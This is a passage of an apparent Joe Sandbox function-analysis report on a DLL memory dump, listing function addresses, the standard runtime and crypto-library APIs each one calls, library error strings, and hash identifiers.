Opcode ID: da0990384bc9d196159c3930c82f8a13c35faae809180efe698eacc3c5a09e10
Instruction ID: 354aa70a4d136bc449200fafb701012b4f4ff5a4528e80a7aae5750135a338ac
Opcode Fuzzy Hash: da0990384bc9d196159c3930c82f8a13c35faae809180efe698eacc3c5a09e10
Instruction Fuzzy Hash: D5316971A05705AFD714CF68C880A9AFBF8FF08210F508A6EE9068BB41D770E644CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6D08DC40 Relevance: 6.1, APIs: 4, Instructions: 90COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 6D08DCC5

Part of subcall function 6D0C9533: std::exception::_Copy_str.LIBCMT ref: 6D0C954E

__CxxThrowException@8.LIBCMT ref: 6D08DCDA

Part of subcall function 6D0CAC75: RaiseException.KERNEL32(?,?,6D0C9C34,400BD10B,?,?,?,?,6D0C9C34,400BD10B,6D0F9C90,6D10B974,400BD10B), ref: 6D0CACB7

Part of subcall function 6D0C9BB5: _malloc.LIBCMT ref: 6D0C9BCF

std::exception::exception.LIBCMT ref: 6D08DD09
__CxxThrowException@8.LIBCMT ref: 6D08DD1E

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaise_mallocstd::exception::_
String ID:
API String ID: 399550787-0
Opcode ID: 63738c3fe55a86b23774a0104d94e3e2138b8e87e92ef30ab7f07bc12dcaf888
Instruction ID: b02d8fc5d762f218c19ecf025b7e5b18cfbf1b958b59bb95284b130d4df752ab
Opcode Fuzzy Hash: 63738c3fe55a86b23774a0104d94e3e2138b8e87e92ef30ab7f07bc12dcaf888
Instruction Fuzzy Hash: 943140B5904209AFEB04CF99E840B9EBBF8BF58300F51855EE91997351D770EA04CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6D0D2645 Relevance: 6.1, APIs: 4, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 6D0D2653

Part of subcall function 6D0C9D66: __FF_MSGBANNER.LIBCMT ref: 6D0C9D7F
Part of subcall function 6D0C9D66: __NMSG_WRITE.LIBCMT ref: 6D0C9D86
Part of subcall function 6D0C9D66: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,00000000,?,6D0C9BD4,6D061290,400BD10B), ref: 6D0C9DAB

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: AllocateHeap_malloc
String ID:
API String ID: 501242067-0
Opcode ID: e6a15e9beb7dde96f55948b71bb6ab724a238918ae56f4c4d4387ed31bc015cc
Instruction ID: d222e2d82a8cd82f6452dad01621e2bd7bbc79ea558faf7055dfd17db401f6c9
Opcode Fuzzy Hash: e6a15e9beb7dde96f55948b71bb6ab724a238918ae56f4c4d4387ed31bc015cc
Instruction Fuzzy Hash: BF112732548315ABFB711F34E80475E37E9AF46765B12412FF904DB150EF30C84087A5

Uniqueness

Uniqueness Score: -1.00%

Function 6D077240 Relevance: 6.1, APIs: 4, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 6D094410: _malloc.LIBCMT ref: 6D09446E

SafeArrayCreateVector.OLEAUT32(00000011,00000000,?), ref: 6D077287
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 6D07729B
_memmove.LIBCMT ref: 6D0772AF
SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6D0772B8

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ArraySafe$Data$AccessCreateUnaccessVector_malloc_memmove
String ID:
API String ID: 583974297-0
Opcode ID: ac75855d33c2f4c61ec25cccba40eae4a17538d67408efc8a463dfa8d63f2055
Instruction ID: 562051a67d17b97237c6c5b4556134a8698fd159256c148588608b6717eeaa73
Opcode Fuzzy Hash: ac75855d33c2f4c61ec25cccba40eae4a17538d67408efc8a463dfa8d63f2055
Instruction Fuzzy Hash: E71151B2904118BBDB14CF95D880EDFBB7DDBD9694B018269F9049B200E770DA058BE4

Uniqueness

Uniqueness Score: -1.00%

Function 6D085A70 Relevance: 6.1, APIs: 4, Instructions: 65COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6D085AB9
VariantCopy.OLEAUT32(?,6D0F9C90), ref: 6D085AC1
VariantClear.OLEAUT32(?), ref: 6D085AE2
__CxxThrowException@8.LIBCMT ref: 6D085AEF

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: Variant$ClearCopyException@8InitThrow
String ID:
API String ID: 3826472263-0
Opcode ID: 19b16a68d253177f00fd8b921e4816445e2455f3156308b95fa5bf37b04a96cb
Instruction ID: d18af84a37556e743bc34950bedcaa0a7578b9f4daf8f66bc644247b9c42f8a3
Opcode Fuzzy Hash: 19b16a68d253177f00fd8b921e4816445e2455f3156308b95fa5bf37b04a96cb
Instruction Fuzzy Hash: C111B176904669ABDF00DF98C8C8BEFBBB8EB45614F11416AE925A7241C7749A0087E1

Uniqueness

Uniqueness Score: -1.00%

Function 6D0D0A60 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 6D0D0A86

Part of subcall function 6D0D08B2: __fltout2.LIBCMT ref: 6D0D08DD

__cftog_l.LIBCMT ref: 6D0D0AAC
__cftoe_l.LIBCMT ref: 6D0D0ADE

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction ID: 5a1ee9f0efce44f581b1e9fa590979c71b3df04fdf71eeda490dbc3020b8cef6
Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
Instruction Fuzzy Hash: 4411723604824ABBDF528E89DC11EEE3F62BB59354B558516FE2C55030C336C5B1AB81

Uniqueness

Uniqueness Score: -1.00%

Function 6D0C8970 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 175COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6D0C8A84
_memmove.LIBCMT ref: 6D0C8AA0

Strings

EncodingParameters, xrefs: 6D0C8A41

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: _memmove_memset
String ID: EncodingParameters
API String ID: 3555123492-55378216
Opcode ID: 66dda8f929167bdf2e9615ac36202d1dc93199aea083f21a25f4592e0bb79286
Instruction ID: ffe97e98ca61c6bf76426f0e37e16498be021684807a4a7b4b7b7705140906d7
Opcode Fuzzy Hash: 66dda8f929167bdf2e9615ac36202d1dc93199aea083f21a25f4592e0bb79286
Instruction Fuzzy Hash: 4961E1B46083419FD304CF69C880A2AFBE9BFC9754F144A1DF59987391DBB4E941CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6D06F190 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON

Download Yara Rule

APIs

Part of subcall function 6D064760: __CxxThrowException@8.LIBCMT ref: 6D0647F9

Part of subcall function 6D098D80: _malloc.LIBCMT ref: 6D098D8A
Part of subcall function 6D098D80: _malloc.LIBCMT ref: 6D098DAF

_memcpy_s.LIBCMT ref: 6D06F282
_memset.LIBCMT ref: 6D06F293

Strings

@, xrefs: 6D06F2DE

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: _malloc$Exception@8Throw_memcpy_s_memset
String ID: @
API String ID: 3081897325-2766056989
Opcode ID: 311f3d9ff2eb66a6045c6cf5dcc10d5711aca2b9d0b7e02b843e5c017162c7e2
Instruction ID: 69039dac2f570c6d072ff6cf3f5ff5878ddbf0aa2a2da718f47b06316c09e34c
Opcode Fuzzy Hash: 311f3d9ff2eb66a6045c6cf5dcc10d5711aca2b9d0b7e02b843e5c017162c7e2
Instruction Fuzzy Hash: 89518370D04249EFEB10CF94D940BDEBBB4BF55308F108198D95967381DB716A49CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 6D064100 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6D064175
_memmove.LIBCMT ref: 6D0641C6

Part of subcall function 6D064010: std::_Xinvalid_argument.LIBCPMT ref: 6D06402A

Strings

string too long, xrefs: 6D064170

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: string too long
API String ID: 2168136238-2556327735
Opcode ID: c3ba24854dc9a5282232ba5453fe515537b96960fc72840999210a6f815dfa87
Instruction ID: f15cb018bd839c02df5c7e1a80c0cc8981dbf7cc10c4697022b5f079db824942
Opcode Fuzzy Hash: c3ba24854dc9a5282232ba5453fe515537b96960fc72840999210a6f815dfa87
Instruction Fuzzy Hash: 9B31C8323186906BF3209E5CECA0B6AF7EDEBAD764720451BE591CB640C771D84083B1

Uniqueness

Uniqueness Score: -1.00%

Function 6D09C350 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 104COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 6D09C39B

Strings

gfff, xrefs: 6D09C3F7
gfff, xrefs: 6D09C3A3

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: Exception@8Throw
String ID: gfff$gfff
API String ID: 2005118841-3084402119
Opcode ID: 0fc975951894ecdd0a9fd187ee17f5a7dd85dbf523fbdf3c3300f41ba2466e2d
Instruction ID: f363f1c3238a29b1bbbfec2b86e3e161e9648e8c76f9f1e5ee4e7bb6efe6afb4
Opcode Fuzzy Hash: 0fc975951894ecdd0a9fd187ee17f5a7dd85dbf523fbdf3c3300f41ba2466e2d
Instruction Fuzzy Hash: 59316171A0420DAFDB14CF98DD80FBEB7B9EB84718F44811CE9159B284D770BA15DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6D0618C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 6D064010: std::_Xinvalid_argument.LIBCPMT ref: 6D06402A

__CxxThrowException@8.LIBCMT ref: 6D06194F

Part of subcall function 6D0CAC75: RaiseException.KERNEL32(?,?,6D0C9C34,400BD10B,?,?,?,?,6D0C9C34,400BD10B,6D0F9C90,6D10B974,400BD10B), ref: 6D0CACB7

std::exception::exception.LIBCMT ref: 6D06198E

Part of subcall function 6D0C95C1: std::exception::operator=.LIBCMT ref: 6D0C95DA

Part of subcall function 6D064010: std::_Xinvalid_argument.LIBCPMT ref: 6D064067
Part of subcall function 6D064010: _memmove.LIBCMT ref: 6D0640C8

Strings

Clone() is not implemented yet., xrefs: 6D0618ED

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$ExceptionException@8RaiseThrow_memmovestd::exception::exceptionstd::exception::operator=
String ID: Clone() is not implemented yet.
API String ID: 2192554526-226299721
Opcode ID: 807290b8ae913ecf73a86d31b20a60927c31c0da13249ae3c4dc52cf48c6dd06
Instruction ID: e8d2ced5fb092d18e5196743051978ddc80f6eb98240d63142aff0691838a871
Opcode Fuzzy Hash: 807290b8ae913ecf73a86d31b20a60927c31c0da13249ae3c4dc52cf48c6dd06
Instruction Fuzzy Hash: 92316071808248BFEB14CFD8D880BAEFBB8FB09754F10462EE525A7681DB749504CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6D095560 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 95COMMON

Download Yara Rule

APIs

Part of subcall function 6D064010: std::_Xinvalid_argument.LIBCPMT ref: 6D06402A

__CxxThrowException@8.LIBCMT ref: 6D095657

Part of subcall function 6D0CAC75: RaiseException.KERNEL32(?,?,6D0C9C34,400BD10B,?,?,?,?,6D0C9C34,400BD10B,6D0F9C90,6D10B974,400BD10B), ref: 6D0CACB7

Strings

InputBuffer, xrefs: 6D0955BF
StringStore: missing InputBuffer argument, xrefs: 6D0955E0

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: ExceptionException@8RaiseThrowXinvalid_argumentstd::_
String ID: InputBuffer$StringStore: missing InputBuffer argument
API String ID: 3718517217-2380213735
Opcode ID: af5a4dd1f41580bfa9f8b125ef9c9889dd00d6f8f3338a592c181d14bef8e723
Instruction ID: 9d0e6fa47cf9acc318cdbbe66f6116349a011ffba1a91df4ddd48d64dc26c45a
Opcode Fuzzy Hash: af5a4dd1f41580bfa9f8b125ef9c9889dd00d6f8f3338a592c181d14bef8e723
Instruction Fuzzy Hash: 804155B150C7809FE310CF29D490B6BBBE4BB99718F404A1EF2A987381DB74D908CB52

Uniqueness

Uniqueness Score: -1.00%

Function 6D061EA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94COMMON

Download Yara Rule

APIs

Part of subcall function 6D064010: std::_Xinvalid_argument.LIBCPMT ref: 6D06402A

__CxxThrowException@8.LIBCMT ref: 6D061F36

Part of subcall function 6D0CAC75: RaiseException.KERNEL32(?,?,6D0C9C34,400BD10B,?,?,?,?,6D0C9C34,400BD10B,6D0F9C90,6D10B974,400BD10B), ref: 6D0CACB7

std::exception::exception.LIBCMT ref: 6D061F6E

Part of subcall function 6D0C95C1: std::exception::operator=.LIBCMT ref: 6D0C95DA

Part of subcall function 6D064010: std::_Xinvalid_argument.LIBCPMT ref: 6D064067
Part of subcall function 6D064010: _memmove.LIBCMT ref: 6D0640C8

Strings

CryptoMaterial: this object does not support precomputation, xrefs: 6D061ED4

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$ExceptionException@8RaiseThrow_memmovestd::exception::exceptionstd::exception::operator=
String ID: CryptoMaterial: this object does not support precomputation
API String ID: 2192554526-3625584042
Opcode ID: 55f7b62d73b4ffffbdafe5db36a6be935bb126d9c172f5567bbb1bbd6140ffbb
Instruction ID: 843715b4b35cf82b626c98f90b91c4dbd763114da14c63cdc73eb8ca352dd6e5
Opcode Fuzzy Hash: 55f7b62d73b4ffffbdafe5db36a6be935bb126d9c172f5567bbb1bbd6140ffbb
Instruction Fuzzy Hash: 67317E71808248BFEB14DF98D880BAEFBB8FB49764F10466EE525A7781DB749504CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6D073317 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 90COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 6D073327

Part of subcall function 6D0CAC75: RaiseException.KERNEL32(?,?,6D0C9C34,400BD10B,?,?,?,?,6D0C9C34,400BD10B,6D0F9C90,6D10B974,400BD10B), ref: 6D0CACB7

std::_Xinvalid_argument.LIBCPMT ref: 6D07336B

Part of subcall function 6D0C90D8: std::exception::exception.LIBCMT ref: 6D0C90ED
Part of subcall function 6D0C90D8: __CxxThrowException@8.LIBCMT ref: 6D0C9102
Part of subcall function 6D0C90D8: std::exception::exception.LIBCMT ref: 6D0C9113

Strings

vector<T> too long, xrefs: 6D073366

Memory Dump Source

Source File: 00000000.00000002.1730238908.000000006D061000.00000020.00000001.01000000.00000008.sdmp, Offset: 6D060000, based on PE: true

Associated: 00000000.00000002.1730220684.000000006D060000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730607874.000000006D0E4000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730700548.000000006D0FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730723533.000000006D100000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730743791.000000006D101000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730764636.000000006D103000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730802709.000000006D10C000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1730841258.000000006D10E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6d060000_file.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception$ExceptionRaiseXinvalid_argumentstd::_
String ID: vector<T> too long
API String ID: 1735018483-3788999226
Opcode ID: 17fc7808f38071e52e1ca503d2e124a1fa9af2a5a11b7045042a9f7a7368aa37
Instruction ID: 7a22a98b07ca1086f9f4f598d04aa41c4b9423b44a7d569b9f323107122625a0
Opcode Fuzzy Hash: 17fc7808f38071e52e1ca503d2e124a1fa9af2a5a11b7045042a9f7a7368aa37
Instruction Fuzzy Hash: 6F31A775A04109AFEB34DF98D8C0B6EB7B1EB49314F114629E9199F390DB71A900CBA2

Uniqueness

Uniqueness Score: -1.00%

